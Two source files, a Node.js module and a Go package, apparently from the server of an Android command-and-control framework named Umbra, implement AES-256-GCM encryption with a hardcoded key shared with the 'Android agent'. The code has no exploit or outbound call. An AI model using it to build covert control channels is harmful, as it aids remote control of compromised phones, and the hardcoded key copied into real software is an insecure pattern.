File: Umbra-Server/crypto.js
'use strict';

const crypto = require('crypto');

// AES-256-GCM encryption key (64 hex chars = 32 bytes)
// Must match Android's CryptoEngine.kt
const KEY_HEX = 'd41d8cd98f00b204e9800998ecf8427ed41d8cd98f00b204e9800998ecf8427e';
const KEY = Buffer.from(KEY_HEX, 'hex');

const IV_LENGTH = 12;  // 96 bits, recommended for GCM
const TAG_LENGTH = 16; // 128 bits

/**
 * Encrypt plaintext using AES-256-GCM.
 * Returns base64 string of: IV (12 bytes) + ciphertext + auth tag (16 bytes).
 */
function encrypt(plaintext) {
  const iv = crypto.randomBytes(IV_LENGTH);
  const cipher = crypto.createCipheriv('aes-256-gcm', KEY, iv, { authTagLength: TAG_LENGTH });

  const encrypted = Buffer.concat([
    cipher.update(String(plaintext), 'utf8'),
    cipher.final()
  ]);

  const tag = cipher.getAuthTag();

  // Combine IV + ciphertext + tag, then base64 encode
  const combined = Buffer.concat([iv, encrypted, tag]);
  return combined.toString('base64');
}

/**
 * Decrypt a base64-encoded payload produced by encrypt().
 * Input format: base64(IV[12] + ciphertext + tag[16])
 */
function decrypt(encoded) {
  const combined = Buffer.from(encoded, 'base64');

  if (combined.length < IV_LENGTH + TAG_LENGTH) {
    throw new Error(`Payload too short: ${combined.length} bytes (need at least ${IV_LENGTH + TAG_LENGTH})`);
  }

  const iv = combined.subarray(0, IV_LENGTH);
  const tag = combined.subarray(combined.length - TAG_LENGTH);
  const encrypted = combined.subarray(IV_LENGTH, combined.length - TAG_LENGTH);

  const decipher = crypto.createDecipheriv('aes-256-gcm', KEY, iv, { authTagLength: TAG_LENGTH });
  decipher.setAuthTag(tag);

  const decrypted = Buffer.concat([
    decipher.update(encrypted),
    decipher.final()
  ]);

  return decrypted.toString('utf8');
}

module.exports = { encrypt, decrypt, KEY_HEX };

File: Umbra-Server/umbra-c2/app/umbra-c2/internal/service/crypto.go
// Package service implements AES-256-GCM encryption/decryption matching the Android agent.
package service

import (
	"crypto/aes"
	"crypto/cipher"
	"crypto/rand"
	"encoding/base64"
	"encoding/hex"
	"fmt"
)

// CryptoKey is the 32-byte AES-256 key shared with the Android agent.
// Derived from hex: d41d8cd98f00b204e9800998ecf8427ed41d8cd98f00b204e9800998ecf8427e
var CryptoKey []byte

func init() {
	keyHex := "d41d8cd98f00b204e9800998ecf8427ed41d8cd98f00b204e9800998ecf8427e"
	var err error
	CryptoKey, err = hex.DecodeString(keyHex)
	if err != nil {
		panic(fmt.Sprintf("crypto: invalid key hex: %v", err))
	}
	if len(CryptoKey) != 32 {
		panic(fmt.Sprintf("crypto: key must be 32 bytes, got %d", len(CryptoKey)))
	}
}

// Encrypt encrypts a plaintext string using AES-256-GCM.
// Returns base64(iv(12 bytes) + ciphertext + tag(16 bytes)).
func Encrypt(plaintext string) (string, error) {
	block, err := aes.NewCipher(CryptoKey)
	if err != nil {
		return "", fmt.Errorf("encrypt: new cipher: %w", err)
	}

	gcm, err := cipher.NewGCM(block)
	if err != nil {
		return "", fmt.Errorf("encrypt: new gcm: %w", err)
	}

	// Generate 12-byte random IV (standard for GCM)
	iv := make([]byte, gcm.NonceSize())
	if _, err := rand.Read(iv); err != nil {
		return "", fmt.Errorf("encrypt: rand iv: %w", err)
	}

	// Seal appends encrypted data to iv, then appends the tag.
	// Output layout: iv(12) + ciphertext + tag(16)
	ciphertext := gcm.Seal(iv, iv, []byte(plaintext), nil)

	return base64.StdEncoding.EncodeToString(ciphertext), nil
}

// Decrypt decrypts a base64-encoded AES-256-GCM ciphertext.
// Format: base64(iv(12 bytes) + ciphertext + tag(16 bytes)).
func Decrypt(encoded string) (string, error) {
	data, err := base64.StdEncoding.DecodeString(encoded)
	if err != nil {
		return "", fmt.Errorf("decrypt: base64 decode: %w", err)
	}

	block, err := aes.NewCipher(CryptoKey)
	if err != nil {
		return "", fmt.Errorf("decrypt: new cipher: %w", err)
	}

	gcm, err := cipher.NewGCM(block)
	if err != nil {
		return "", fmt.Errorf("decrypt: new gcm: %w", err)
	}

	nonceSize := gcm.NonceSize()
	if len(data) < nonceSize {
		return "", fmt.Errorf("decrypt: ciphertext too short (need at least %d bytes, got %d)", nonceSize, len(data))
	}

	iv := data[:nonceSize]
	ciphertext := data[nonceSize:]

	plaintext, err := gcm.Open(nil, iv, ciphertext, nil)
	if err != nil {
		return "", fmt.Errorf("decrypt: gcm open: %w", err)
	}

	return string(plaintext), nil
}
